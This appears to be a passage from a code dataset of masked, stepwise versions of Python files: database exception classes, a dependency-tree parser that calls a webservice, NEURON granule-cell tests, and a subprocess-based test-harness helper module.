"step-3": "N = int(input())\nStopPoint = N\ncycle = 0\nten = 0\none = 0\nnew_N = 0\nwhile True:\n ten = N // 10\n one = N % 10\n total = ten + one\n new_N = one * 10 + total % 10\n cycle += 1\n N = new_N\n if new_N == StopPoint:\n break\nprint(cycle)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
"""This module provides the definition of the exceptions that can be raised from the database module."""
class DatabaseError(Exception):
"""Raised when the requested database operation can not be completed."""
pass
class InvalidDictError(Exception):
"""Raised when the object can not be created from the provided dict."""
pass
|
normal
|
{
"blob_id": "94130b4962ecff2ea087ab34cf50a084254bf980",
"index": 8948,
"step-1": "<mask token>\n\n\nclass InvalidDictError(Exception):\n <mask token>\n pass\n",
"step-2": "<mask token>\n\n\nclass InvalidDictError(Exception):\n \"\"\"Raised when the object can not be created from the provided dict.\"\"\"\n pass\n",
"step-3": "<mask token>\n\n\nclass DatabaseError(Exception):\n <mask token>\n pass\n\n\nclass InvalidDictError(Exception):\n \"\"\"Raised when the object can not be created from the provided dict.\"\"\"\n pass\n",
"step-4": "<mask token>\n\n\nclass DatabaseError(Exception):\n \"\"\"Raised when the requested database operation can not be completed.\"\"\"\n pass\n\n\nclass InvalidDictError(Exception):\n \"\"\"Raised when the object can not be created from the provided dict.\"\"\"\n pass\n",
"step-5": "\"\"\"This module provides the definition of the exceptions that can be raised from the database module.\"\"\"\n\nclass DatabaseError(Exception):\n \"\"\"Raised when the requested database operation can not be completed.\"\"\"\n pass\n\nclass InvalidDictError(Exception):\n \"\"\"Raised when the object can not be created from the provided dict.\"\"\"\n pass",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import itertools
import urllib.parse
import urllib.request
import word2vec
# MSD: http://corpus.leeds.ac.uk/mocky/ru-table.tab
# Universal: http://universaldependencies.org/ru/pos/index.html
def convert_pos_MSD_to_Universal(pos):
if pos.startswith('A'):
return 'ADJ'
elif pos.startswith('C'):
return 'CCONJ'
elif pos.startswith('I'):
return 'INTJ'
elif pos.startswith('M'):
return 'NUM'
elif pos.startswith('Nc'):
return 'NOUN'
elif pos.startswith('Np'):
return 'PROPN'
elif pos.startswith('N'):
return 'NOUN'
elif pos.startswith('P'):
return 'PRON' # TODO: or DET
elif pos.startswith('Q'):
return 'PART'
elif pos.startswith('R'):
return 'ADV'
elif pos.startswith('S'):
return 'ADP'
elif pos.startswith('V'):
return 'VERB' # TODO: or AUX
elif pos.startswith('SENT') or pos.startswith('PUNC'):
return 'PUNCT'
else:
return 'X'
# ------------------
# get_dep_tree(sentence)
# ---
# Creates a word dependency tree from a sentence.
# Returns: deptree=(node, [deptree])
# Creates a deptree from the webservice response dictionary
def make_dep_tree(respDict, idx):
if idx == 0:
el = None
else:
el = respDict[idx]
children = [(k, respDict[k]) for k in respDict if int(respDict[k][6]) == idx]
childTrees = [ make_dep_tree(respDict, k) for (k, c) in children ]
return (el, childTrees)
def get_dep_tree(sentence):
url = 'http://deptree.jental.name/parse?' + urllib.parse.urlencode({'text': sentence})
respRaw = urllib.request.urlopen(url)
resp = respRaw.read()
respStr = resp.decode('utf-8')
respList = [ r[1:-1].split('\\t') for r in respStr[1:-1].split(',') ]
respDict = dict([(int(r[0]), r + [convert_pos_MSD_to_Universal(r[5])]) for r in respList])
(root, trees) = make_dep_tree(respDict, 0)
if len(trees) == 0:
print('No tree', sentence, trees)
return None
else:
return trees[0]
# ------------------
# filter_dep_tree(tree)
# ---
# Filters out invaluable parts of speech.
# Returns: deptree=(node, [deptree])
def filter_dep_tree(tree):
root, children = tree
posp = convert_pos_MSD_to_Universal(root[3])
if (posp == 'ADJ' or posp == 'NUM' or posp == 'NOUN' or posp == 'PROPN' or posp == 'ADV' or posp == 'VERB'):
res = [ (root, list(itertools.chain.from_iterable([ filter_dep_tree(c) for c in children ]))) ]
else:
cd = [ filter_dep_tree(c) for c in children ]
if len(cd) > 0:
res = list(itertools.chain.from_iterable(cd))
else:
res = []
return res
# ------------------
# print_dep_tree(tree)
# ---
# Prints a word dependency tree
def print_dep_tree(tree):
def pdt(t, offset):
root, children = t
print(''.join([ ' ' for i in range(0, offset) ]), root[1], root[3])
for c in children:
pdt(c, offset + 1)
pdt(tree, 0)
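# Example usage (illustrative sketch; assumes the deptree webservice above is
# reachable and that the sentence yields at least one parse):
#
#     tree = get_dep_tree('Мама мыла раму.')
#     if tree is not None:
#         filtered = filter_dep_tree(tree)
#         if filtered:
#             print_dep_tree(filtered[0])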
|
normal
|
{
"blob_id": "b2a2e06c5db8b12acbc852bafc4ea869b006c1c8",
"index": 9722,
"step-1": "<mask token>\n\n\ndef convert_pos_MSD_to_Universal(pos):\n if pos.startswith('A'):\n return 'ADJ'\n elif pos.startswith('C'):\n return 'CCONJ'\n elif pos.startswith('I'):\n return 'INTJ'\n elif pos.startswith('M'):\n return 'NUM'\n elif pos.startswith('Nc'):\n return 'NOUN'\n elif pos.startswith('Np'):\n return 'PROPN'\n elif pos.startswith('N'):\n return 'NOUN'\n elif pos.startswith('P'):\n return 'PRON'\n elif pos.startswith('Q'):\n return 'PART'\n elif pos.startswith('R'):\n return 'ADV'\n elif pos.startswith('S'):\n return 'ADP'\n elif pos.startswith('V'):\n return 'VERB'\n elif pos.startswith('SENT') or pos.startswith('PUNC'):\n return 'PUNCT'\n else:\n return 'X'\n\n\n<mask token>\n\n\ndef filter_dep_tree(tree):\n root, children = tree\n posp = convert_pos_MSD_to_Universal(root[3])\n if (posp == 'ADJ' or posp == 'NUM' or posp == 'NOUN' or posp == 'PROPN' or\n posp == 'ADV' or posp == 'VERB'):\n res = [(root, list(itertools.chain.from_iterable([filter_dep_tree(c\n ) for c in children])))]\n else:\n cd = [filter_dep_tree(c) for c in children]\n if len(cd) > 0:\n res = list(itertools.chain.from_iterable(cd))\n else:\n res = []\n return res\n\n\ndef print_dep_tree(tree):\n\n def pdt(t, offset):\n root, children = t\n print(''.join([' ' for i in range(0, offset)]), root[1], root[3])\n for c in children:\n pdt(c, offset + 1)\n pdt(tree, 0)\n",
"step-2": "<mask token>\n\n\ndef convert_pos_MSD_to_Universal(pos):\n if pos.startswith('A'):\n return 'ADJ'\n elif pos.startswith('C'):\n return 'CCONJ'\n elif pos.startswith('I'):\n return 'INTJ'\n elif pos.startswith('M'):\n return 'NUM'\n elif pos.startswith('Nc'):\n return 'NOUN'\n elif pos.startswith('Np'):\n return 'PROPN'\n elif pos.startswith('N'):\n return 'NOUN'\n elif pos.startswith('P'):\n return 'PRON'\n elif pos.startswith('Q'):\n return 'PART'\n elif pos.startswith('R'):\n return 'ADV'\n elif pos.startswith('S'):\n return 'ADP'\n elif pos.startswith('V'):\n return 'VERB'\n elif pos.startswith('SENT') or pos.startswith('PUNC'):\n return 'PUNCT'\n else:\n return 'X'\n\n\ndef make_dep_tree(respDict, idx):\n if idx == 0:\n el = None\n else:\n el = respDict[idx]\n children = [(k, respDict[k]) for k in respDict if int(respDict[k][6]) ==\n idx]\n childTrees = [make_dep_tree(respDict, k) for k, c in children]\n return el, childTrees\n\n\n<mask token>\n\n\ndef filter_dep_tree(tree):\n root, children = tree\n posp = convert_pos_MSD_to_Universal(root[3])\n if (posp == 'ADJ' or posp == 'NUM' or posp == 'NOUN' or posp == 'PROPN' or\n posp == 'ADV' or posp == 'VERB'):\n res = [(root, list(itertools.chain.from_iterable([filter_dep_tree(c\n ) for c in children])))]\n else:\n cd = [filter_dep_tree(c) for c in children]\n if len(cd) > 0:\n res = list(itertools.chain.from_iterable(cd))\n else:\n res = []\n return res\n\n\ndef print_dep_tree(tree):\n\n def pdt(t, offset):\n root, children = t\n print(''.join([' ' for i in range(0, offset)]), root[1], root[3])\n for c in children:\n pdt(c, offset + 1)\n pdt(tree, 0)\n",
"step-3": "<mask token>\n\n\ndef convert_pos_MSD_to_Universal(pos):\n if pos.startswith('A'):\n return 'ADJ'\n elif pos.startswith('C'):\n return 'CCONJ'\n elif pos.startswith('I'):\n return 'INTJ'\n elif pos.startswith('M'):\n return 'NUM'\n elif pos.startswith('Nc'):\n return 'NOUN'\n elif pos.startswith('Np'):\n return 'PROPN'\n elif pos.startswith('N'):\n return 'NOUN'\n elif pos.startswith('P'):\n return 'PRON'\n elif pos.startswith('Q'):\n return 'PART'\n elif pos.startswith('R'):\n return 'ADV'\n elif pos.startswith('S'):\n return 'ADP'\n elif pos.startswith('V'):\n return 'VERB'\n elif pos.startswith('SENT') or pos.startswith('PUNC'):\n return 'PUNCT'\n else:\n return 'X'\n\n\ndef make_dep_tree(respDict, idx):\n if idx == 0:\n el = None\n else:\n el = respDict[idx]\n children = [(k, respDict[k]) for k in respDict if int(respDict[k][6]) ==\n idx]\n childTrees = [make_dep_tree(respDict, k) for k, c in children]\n return el, childTrees\n\n\ndef get_dep_tree(sentence):\n url = 'http://deptree.jental.name/parse?' + urllib.parse.urlencode({\n 'text': sentence})\n respRaw = urllib.request.urlopen(url)\n resp = respRaw.read()\n respStr = resp.decode('utf-8')\n respList = [r[1:-1].split('\\\\t') for r in respStr[1:-1].split(',')]\n respDict = dict([(int(r[0]), r + [convert_pos_MSD_to_Universal(r[5])]) for\n r in respList])\n root, trees = make_dep_tree(respDict, 0)\n if len(trees) == 0:\n print('No tree', sentence, trees)\n return None\n else:\n return trees[0]\n\n\ndef filter_dep_tree(tree):\n root, children = tree\n posp = convert_pos_MSD_to_Universal(root[3])\n if (posp == 'ADJ' or posp == 'NUM' or posp == 'NOUN' or posp == 'PROPN' or\n posp == 'ADV' or posp == 'VERB'):\n res = [(root, list(itertools.chain.from_iterable([filter_dep_tree(c\n ) for c in children])))]\n else:\n cd = [filter_dep_tree(c) for c in children]\n if len(cd) > 0:\n res = list(itertools.chain.from_iterable(cd))\n else:\n res = []\n return res\n\n\ndef print_dep_tree(tree):\n\n def pdt(t, offset):\n root, children = t\n print(''.join([' ' for i in range(0, offset)]), root[1], root[3])\n for c in children:\n pdt(c, offset + 1)\n pdt(tree, 0)\n",
"step-4": "import itertools\nimport urllib\nimport word2vec\n\n\ndef convert_pos_MSD_to_Universal(pos):\n if pos.startswith('A'):\n return 'ADJ'\n elif pos.startswith('C'):\n return 'CCONJ'\n elif pos.startswith('I'):\n return 'INTJ'\n elif pos.startswith('M'):\n return 'NUM'\n elif pos.startswith('Nc'):\n return 'NOUN'\n elif pos.startswith('Np'):\n return 'PROPN'\n elif pos.startswith('N'):\n return 'NOUN'\n elif pos.startswith('P'):\n return 'PRON'\n elif pos.startswith('Q'):\n return 'PART'\n elif pos.startswith('R'):\n return 'ADV'\n elif pos.startswith('S'):\n return 'ADP'\n elif pos.startswith('V'):\n return 'VERB'\n elif pos.startswith('SENT') or pos.startswith('PUNC'):\n return 'PUNCT'\n else:\n return 'X'\n\n\ndef make_dep_tree(respDict, idx):\n if idx == 0:\n el = None\n else:\n el = respDict[idx]\n children = [(k, respDict[k]) for k in respDict if int(respDict[k][6]) ==\n idx]\n childTrees = [make_dep_tree(respDict, k) for k, c in children]\n return el, childTrees\n\n\ndef get_dep_tree(sentence):\n url = 'http://deptree.jental.name/parse?' + urllib.parse.urlencode({\n 'text': sentence})\n respRaw = urllib.request.urlopen(url)\n resp = respRaw.read()\n respStr = resp.decode('utf-8')\n respList = [r[1:-1].split('\\\\t') for r in respStr[1:-1].split(',')]\n respDict = dict([(int(r[0]), r + [convert_pos_MSD_to_Universal(r[5])]) for\n r in respList])\n root, trees = make_dep_tree(respDict, 0)\n if len(trees) == 0:\n print('No tree', sentence, trees)\n return None\n else:\n return trees[0]\n\n\ndef filter_dep_tree(tree):\n root, children = tree\n posp = convert_pos_MSD_to_Universal(root[3])\n if (posp == 'ADJ' or posp == 'NUM' or posp == 'NOUN' or posp == 'PROPN' or\n posp == 'ADV' or posp == 'VERB'):\n res = [(root, list(itertools.chain.from_iterable([filter_dep_tree(c\n ) for c in children])))]\n else:\n cd = [filter_dep_tree(c) for c in children]\n if len(cd) > 0:\n res = list(itertools.chain.from_iterable(cd))\n else:\n res = []\n return res\n\n\ndef print_dep_tree(tree):\n\n def pdt(t, offset):\n root, children = t\n print(''.join([' ' for i in range(0, offset)]), root[1], root[3])\n for c in children:\n pdt(c, offset + 1)\n pdt(tree, 0)\n",
"step-5": "import itertools\n\nimport urllib\n\nimport word2vec\n\n# MSD: http://corpus.leeds.ac.uk/mocky/ru-table.tab\n# Universal: http://universaldependencies.org/ru/pos/index.html\ndef convert_pos_MSD_to_Universal(pos):\n if pos.startswith('A'):\n return 'ADJ'\n elif pos.startswith('C'):\n return 'CCONJ'\n elif pos.startswith('I'):\n return 'INTJ'\n elif pos.startswith('M'):\n return 'NUM'\n elif pos.startswith('Nc'):\n return 'NOUN'\n elif pos.startswith('Np'):\n return 'PROPN'\n elif pos.startswith('N'):\n return 'NOUN'\n elif pos.startswith('P'):\n return 'PRON' # TODO: or DET \n elif pos.startswith('Q'):\n return 'PART'\n elif pos.startswith('R'):\n return 'ADV'\n elif pos.startswith('S'):\n return 'ADP'\n elif pos.startswith('V'):\n return 'VERB' # TODO: or AUX\n elif pos.startswith('SENT') or pos.startswith('PUNC'):\n return 'PUNCT'\n else:\n return 'X'\n\n# ------------------\n# get_dep_tree(sentence)\n# ---\n# Creates a word dependency tree from a sentence.\n# Returns: deptree=(node, [deptree])\n\n# Creates a deptree from the webservice response dictionary\ndef make_dep_tree(respDict, idx):\n if idx == 0:\n el = None\n else:\n el = respDict[idx]\n children = [(k, respDict[k]) for k in respDict if int(respDict[k][6]) == idx]\n childTrees = [ make_dep_tree(respDict, k) for (k, c) in children ]\n\n return (el, childTrees)\n\ndef get_dep_tree(sentence):\n url = 'http://deptree.jental.name/parse?' + urllib.parse.urlencode({'text': sentence})\n respRaw = urllib.request.urlopen(url)\n resp = respRaw.read()\n respStr = resp.decode('utf-8')\n respList = [ r[1:-1].split('\\\\t') for r in respStr[1:-1].split(',') ]\n respDict = dict([(int(r[0]), r + [convert_pos_MSD_to_Universal(r[5])]) for r in respList])\n\n (root, trees) = make_dep_tree(respDict, 0)\n\n if len(trees) == 0:\n print('No tree', sentence, trees)\n return None\n else:\n return trees[0]\n\n# ------------------\n# filter_dep_tree(tree)\n# ---\n# Filters out invaluable parts of speech.\n# Returns: deptree=(node, [deptree])\n\ndef filter_dep_tree(tree):\n root, children = tree\n posp = convert_pos_MSD_to_Universal(root[3])\n if (posp == 'ADJ' or posp == 'NUM' or posp == 'NOUN' or posp == 'PROPN' or posp == 'ADV' or posp == 'VERB'):\n res = [ (root, list(itertools.chain.from_iterable([ filter_dep_tree(c) for c in children ]))) ]\n else:\n cd = [ filter_dep_tree(c) for c in children ]\n if len(cd) > 0:\n res = list(itertools.chain.from_iterable(cd))\n else:\n res = []\n return res\n\n# ------------------\n# filter_dep_tree(tree)\n# ---\n# Prints a word dependency tree\n\ndef print_dep_tree(tree):\n def pdt(t, offset):\n root, children = t\n print(''.join([ ' ' for i in range(0, offset) ]), root[1], root[3])\n for c in children:\n pdt(c, offset + 1)\n pdt(tree, 0)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import sys, os; sys.path.insert(0,'..'); sys.path.insert(0,'../NEURON');
from tests.cells.NEURONCellTest import NEURONCellTest
from tests.cells.NeuroMLCellTest import NeuroMLCellTest
class NEURON(NEURONCellTest):
def __init__(self):
super(NEURON, self).__init__()
self.path = "../NEURON/granule.hoc"
self.label = "granule"
self.resultsFile = "results/cells/granule/NEURON.json"
self.currentRange = (-0.01, 0.1)
def prepare(self, h):
# Build the network with 1GC
sys.path.append(os.getcwd())
import customsim
import modeldata
customsim.setup(1, 1)
model = modeldata.getmodel()
cell = model.granules[110821] # The GC of the first MC
h.celsius = 24
return cell
class NeuroML(NeuroMLCellTest):
def __init__(self):
super(NeuroML, self).__init__()
self.path = "../NeuroML2/GranuleCells/Exported/Granule_0_110821.cell.nml"
self.label = "granule"
self.resultsFile = "results/cells/granule/NeuroML.json"
self.id = "Granule_0_110821"
self.currentRange = (-0.01, 0.1)
def prepare(self, h):
# Load the cell hoc
h.load_file(self.id+".hoc")
cell = getattr(h,self.id)()
h.celsius = 24
return cell
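# Note: both classes only override construction parameters and prepare(h); the
# base NEURONCellTest/NeuroMLCellTest classes are assumed to drive the actual
# current injections over currentRange and to write the listed results files.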
|
normal
|
{
"blob_id": "6dbafbcf126c37edb2187eb28c01e2c1125c1c64",
"index": 7134,
"step-1": "<mask token>\n\n\nclass NEURON(NEURONCellTest):\n\n def __init__(self):\n super(NEURON, self).__init__()\n self.path = '../NEURON/granule.hoc'\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NEURON.json'\n self.currentRange = -0.01, 0.1\n <mask token>\n\n\nclass NeuroML(NeuroMLCellTest):\n\n def __init__(self):\n super(NeuroML, self).__init__()\n self.path = (\n '../NeuroML2/GranuleCells/Exported/Granule_0_110821.cell.nml')\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NeuroML.json'\n self.id = 'Granule_0_110821'\n self.currentRange = -0.01, 0.1\n\n def prepare(self, h):\n h.load_file(self.id + '.hoc')\n cell = getattr(h, self.id)()\n h.celsius = 24\n return cell\n",
"step-2": "<mask token>\n\n\nclass NEURON(NEURONCellTest):\n\n def __init__(self):\n super(NEURON, self).__init__()\n self.path = '../NEURON/granule.hoc'\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NEURON.json'\n self.currentRange = -0.01, 0.1\n\n def prepare(self, h):\n sys.path.append(os.getcwd())\n import customsim\n import modeldata\n customsim.setup(1, 1)\n model = modeldata.getmodel()\n cell = model.granules[110821]\n h.celsius = 24\n return cell\n\n\nclass NeuroML(NeuroMLCellTest):\n\n def __init__(self):\n super(NeuroML, self).__init__()\n self.path = (\n '../NeuroML2/GranuleCells/Exported/Granule_0_110821.cell.nml')\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NeuroML.json'\n self.id = 'Granule_0_110821'\n self.currentRange = -0.01, 0.1\n\n def prepare(self, h):\n h.load_file(self.id + '.hoc')\n cell = getattr(h, self.id)()\n h.celsius = 24\n return cell\n",
"step-3": "<mask token>\nsys.path.insert(0, '..')\nsys.path.insert(0, '../NEURON')\n<mask token>\n\n\nclass NEURON(NEURONCellTest):\n\n def __init__(self):\n super(NEURON, self).__init__()\n self.path = '../NEURON/granule.hoc'\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NEURON.json'\n self.currentRange = -0.01, 0.1\n\n def prepare(self, h):\n sys.path.append(os.getcwd())\n import customsim\n import modeldata\n customsim.setup(1, 1)\n model = modeldata.getmodel()\n cell = model.granules[110821]\n h.celsius = 24\n return cell\n\n\nclass NeuroML(NeuroMLCellTest):\n\n def __init__(self):\n super(NeuroML, self).__init__()\n self.path = (\n '../NeuroML2/GranuleCells/Exported/Granule_0_110821.cell.nml')\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NeuroML.json'\n self.id = 'Granule_0_110821'\n self.currentRange = -0.01, 0.1\n\n def prepare(self, h):\n h.load_file(self.id + '.hoc')\n cell = getattr(h, self.id)()\n h.celsius = 24\n return cell\n",
"step-4": "import sys, os\nsys.path.insert(0, '..')\nsys.path.insert(0, '../NEURON')\nfrom tests.cells.NEURONCellTest import NEURONCellTest\nfrom tests.cells.NeuroMLCellTest import NeuroMLCellTest\n\n\nclass NEURON(NEURONCellTest):\n\n def __init__(self):\n super(NEURON, self).__init__()\n self.path = '../NEURON/granule.hoc'\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NEURON.json'\n self.currentRange = -0.01, 0.1\n\n def prepare(self, h):\n sys.path.append(os.getcwd())\n import customsim\n import modeldata\n customsim.setup(1, 1)\n model = modeldata.getmodel()\n cell = model.granules[110821]\n h.celsius = 24\n return cell\n\n\nclass NeuroML(NeuroMLCellTest):\n\n def __init__(self):\n super(NeuroML, self).__init__()\n self.path = (\n '../NeuroML2/GranuleCells/Exported/Granule_0_110821.cell.nml')\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NeuroML.json'\n self.id = 'Granule_0_110821'\n self.currentRange = -0.01, 0.1\n\n def prepare(self, h):\n h.load_file(self.id + '.hoc')\n cell = getattr(h, self.id)()\n h.celsius = 24\n return cell\n",
"step-5": "import sys, os; sys.path.insert(0,'..'); sys.path.insert(0,'../NEURON');\r\nfrom tests.cells.NEURONCellTest import NEURONCellTest\r\nfrom tests.cells.NeuroMLCellTest import NeuroMLCellTest\r\n\r\nclass NEURON(NEURONCellTest):\r\n\r\n def __init__(self):\r\n super(NEURON, self).__init__()\r\n\r\n self.path = \"../NEURON/granule.hoc\"\r\n self.label = \"granule\"\r\n self.resultsFile = \"results/cells/granule/NEURON.json\"\r\n self.currentRange = (-0.01, 0.1)\r\n\r\n def prepare(self, h):\r\n\r\n # Build the network with 1GC\r\n sys.path.append(os.getcwd())\r\n import customsim\r\n import modeldata\r\n customsim.setup(1, 1)\r\n model = modeldata.getmodel()\r\n cell = model.granules[110821] # The GC of the first MC\r\n\r\n h.celsius = 24\r\n\r\n return cell\r\n\r\nclass NeuroML(NeuroMLCellTest):\r\n def __init__(self):\r\n super(NeuroML, self).__init__()\r\n\r\n self.path = \"../NeuroML2/GranuleCells/Exported/Granule_0_110821.cell.nml\"\r\n self.label = \"granule\"\r\n self.resultsFile = \"results/cells/granule/NeuroML.json\"\r\n self.id = \"Granule_0_110821\"\r\n self.currentRange = (-0.01, 0.1)\r\n\r\n def prepare(self, h):\r\n # Load the cell hoc\r\n h.load_file(self.id+\".hoc\")\r\n\r\n cell = getattr(h,self.id)()\r\n\r\n h.celsius = 24\r\n\r\n return cell\r\n\r\n\r\n\r\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
# -*- coding: utf-8 -*-
import os
import sys
import socket
import signal
import functools
import atexit
import tempfile
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
from queue import Queue, Empty
from time import sleep
import json
from .exceptions import CommandError, TimeoutWaitingFor
ON_POSIX = 'posix' in sys.builtin_module_names
# Directory relative to basetest module location
CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))
# Location of binary files (usually the src/ folder)
BIN_PREFIX = os.path.abspath(
os.path.join(CURRENT_DIR, "..", "..", "src")
)
# Default location of test certificates
DEFAULT_CERT_PATH = os.path.abspath(
os.path.join(CURRENT_DIR, "..", "test_certs")
)
# Default location of test extensions
DEFAULT_EXTENSION_PATH = os.path.abspath(
os.path.join(CURRENT_DIR, "..", "test_extensions")
)
# Environment flags to control skipping of shared tests
SHARED_SKIP = os.environ.get("SHARED_SKIP", False)
# Environment flags to control use of PATH or in-tree binaries
SHARED_USE_PATH = os.environ.get("SHARED_USE_PATH", False)
UUID_REGEXP = ("[0-9A-Fa-f]{8}-" + ("[0-9A-Fa-f]{4}-" * 3) + "[0-9A-Fa-f]{12}")
def shared_binary_location(cmd="shared"):
""" ../src/ is used by default.
"""
    # NOTE: the in-tree binary is always returned here, so the PATH-aware
    # lookup on the following line is never reached.
    return os.path.join(BIN_PREFIX, cmd)
    return binary_location(cmd, SHARED_USE_PATH)
def binary_location(cmd, USE_PATH=False):
""" ../src/ is used by default.
"""
return os.path.join(BIN_PREFIX, cmd)
def wait_condition(cond, timeout=1, sleeptime=.01):
"""Wait for condition to return anything other than None
"""
# NOTE Increasing sleeptime can dramatically increase testsuite runtime
# It also reduces CPU load significantly
if timeout is None:
timeout = 1
if timeout < sleeptime:
print("Warning, timeout cannot be smaller than", sleeptime)
timeout = sleeptime
# Max number of attempts until giving up
tries = int(timeout / sleeptime)
for i in range(tries):
val = cond()
if val is not None:
break
sleep(sleeptime)
return val
def wait_process(pid, timeout=None):
"""Wait for process to finish
"""
def process():
try:
os.kill(pid, 0)
except OSError:
# Process is dead
return True
else:
# Process is still ticking
return None
return wait_condition(process, timeout)
def _queue_output(arguments, pidq, outputq):
"""Read/Write output/input of given process.
This function is meant to be executed in a thread as it may block
"""
kwargs = arguments["process"]
input = arguments["input"]
try:
proc = Popen(**kwargs)
except OSError as e:
# pid None is read by the main thread as a crash of the process
pidq.put(None)
outputq.put((
"",
("Unexpected exception caught during execution: '{0}' . ".format(e)),
255)) # false exitcode
return
# Put the PID in the queue for main process to know.
pidq.put(proc.pid)
# Send input and wait for finish
out, err = proc.communicate(input)
out, err = out.decode('utf-8'), err.decode('utf-8')
# Give the output back to the caller
outputq.put((out, err, proc.returncode))
def _retrieve_output(thread, timeout, queue, thread_error):
"""Fetch output from binary subprocess queues
"""
# Try to join the thread on failure abort
thread.join(timeout)
if thread.isAlive():
# Join should have killed the thread. This is unexpected
raise TimeoutWaitingFor(thread_error + ". Unexpected error")
# Thread died so we should have output
try:
# data = (stdout, stderr, exitcode)
data = queue.get(timeout=timeout)
except Empty:
data = TimeoutWaitingFor("streams from program")
return data
def _get_output(arguments, timeout=None):
"""Collect output from the subprocess without blocking the main process if
subprocess hangs.
"""
# NOTE Increase this value if tests fail with None being received as
# stdout/stderr instead of the expected content
output_timeout = 0.1 # seconds
pidq = Queue()
outputq = Queue()
t = Thread(target=_queue_output, args=(arguments, pidq, outputq))
t.daemon = True
t.start()
try:
pid = pidq.get(timeout=timeout)
except Empty:
pid = None
# Process crashed or timed out for some reason
if pid is None:
return _retrieve_output(t, output_timeout, outputq,
"Program to start")
# Wait for process to finish (normal execution)
state = wait_process(pid, timeout)
if state:
# Process finished
return _retrieve_output(t, output_timeout, outputq,
"Program thread to join")
# If we reach this point we assume the process got stuck or timed out
for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):
# Start with lower signals and escalate if process ignores them
try:
            os.kill(pid, sig)
except OSError as e:
# 3 means the process finished/died between last check and now
if e.errno != 3:
raise
# Wait for process to finish (should die/exit after signal)
state = wait_process(pid, timeout)
if state:
# Process finished
return _retrieve_output(t, output_timeout, outputq,
"Program to die")
# This should never happen but in case something goes really bad
raise OSError("Program stopped responding and couldn't be killed")
def run_cmd_wait(cmd, input=None, stdout=PIPE, stderr=PIPE,
merge_streams=False, env=os.environ, timeout=None):
"Run a subprocess and wait for it to finish"
if input is None:
stdin = None
else:
stdin = PIPE
if merge_streams:
stderr = STDOUT
else:
stderr = PIPE
arguments = {
"process": {
"args": cmd,
"stdin": stdin,
"stdout": stdout,
"stderr": stderr,
"bufsize": 1,
"close_fds": ON_POSIX,
"env": env,
},
"input": input,
}
out, err, exit = _get_output(arguments, timeout)
if merge_streams:
if exit != 0:
raise CommandError(cmd, exit, out)
else:
return exit, out
else:
if exit != 0:
raise CommandError(cmd, exit, out, err)
else:
return exit, out, err
def run_cmd_wait_nofail(*args, **kwargs):
"""Same as run_cmd_wait but silence the exception if it happens"""
try:
return run_cmd_wait(*args, **kwargs)
except CommandError as e:
return e.code, e.out, e.err
def memoize(obj):
"""Keep an in-memory cache of function results given its inputs
"""
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
from shutil import which
which = memoize(which)
def parse_datafile(file):
"""Parse .data files, treating files as JSON
"""
data = []
with open(file) as fh:
for line in fh:
line = line.rstrip("\n")
# Turn [] strings into {} to be treated properly as JSON hashes
if line.startswith('[') and line.endswith(']'):
line = '{' + line[1:-1] + '}'
if line.startswith("{"):
data.append(json.loads(line))
else:
data.append(line)
return data
def mkstemp(data):
"""
Create a temporary file that is removed at process exit
"""
def rmtemp(name):
try:
os.remove(name)
except OSError:
pass
f = tempfile.NamedTemporaryFile(delete=False)
f.write(data)
f.close()
# Ensure removal at end of python session
atexit.register(rmtemp, f.name)
return f.name
def mkstemp_exec(data):
"""Create a temporary executable file that is removed at process exit
"""
name = mkstemp(data)
os.chmod(name, 0o755)
return name
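# Example usage (illustrative sketch; assumes a POSIX environment with 'echo'
# and /bin/sh available):
#
#     code, out, err = run_cmd_wait(["echo", "hello"], timeout=5)
#     assert code == 0 and out.strip() == "hello"
#
#     script = mkstemp_exec(b"#!/bin/sh\necho from-temp\n")
#     code, out, err = run_cmd_wait([script], timeout=5)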
# vim: ai sts=4 et sw=4
|
normal
|
{
"blob_id": "7f220a970d65a91228501f7db59089e6c0604fb5",
"index": 9915,
"step-1": "<mask token>\n\n\ndef wait_condition(cond, timeout=1, sleeptime=0.01):\n \"\"\"Wait for condition to return anything other than None\n \"\"\"\n if timeout is None:\n timeout = 1\n if timeout < sleeptime:\n print('Warning, timeout cannot be smaller than', sleeptime)\n timeout = sleeptime\n tries = int(timeout / sleeptime)\n for i in range(tries):\n val = cond()\n if val is not None:\n break\n sleep(sleeptime)\n return val\n\n\n<mask token>\n\n\ndef _queue_output(arguments, pidq, outputq):\n \"\"\"Read/Write output/input of given process.\n This function is meant to be executed in a thread as it may block\n \"\"\"\n kwargs = arguments['process']\n input = arguments['input']\n try:\n proc = Popen(**kwargs)\n except OSError as e:\n pidq.put(None)\n outputq.put(('',\n \"Unexpected exception caught during execution: '{0}' . \".format\n (e), 255))\n return\n pidq.put(proc.pid)\n out, err = proc.communicate(input)\n out, err = out.decode('utf-8'), err.decode('utf-8')\n outputq.put((out, err, proc.returncode))\n\n\ndef _retrieve_output(thread, timeout, queue, thread_error):\n \"\"\"Fetch output from binary subprocess queues\n \"\"\"\n thread.join(timeout)\n if thread.isAlive():\n raise TimeoutWaitingFor(thread_error + '. Unexpected error')\n try:\n data = queue.get(timeout=timeout)\n except Empty:\n data = TimeoutWaitingFor('streams from program')\n return data\n\n\ndef _get_output(arguments, timeout=None):\n \"\"\"Collect output from the subprocess without blocking the main process if\n subprocess hangs.\n \"\"\"\n output_timeout = 0.1\n pidq = Queue()\n outputq = Queue()\n t = Thread(target=_queue_output, args=(arguments, 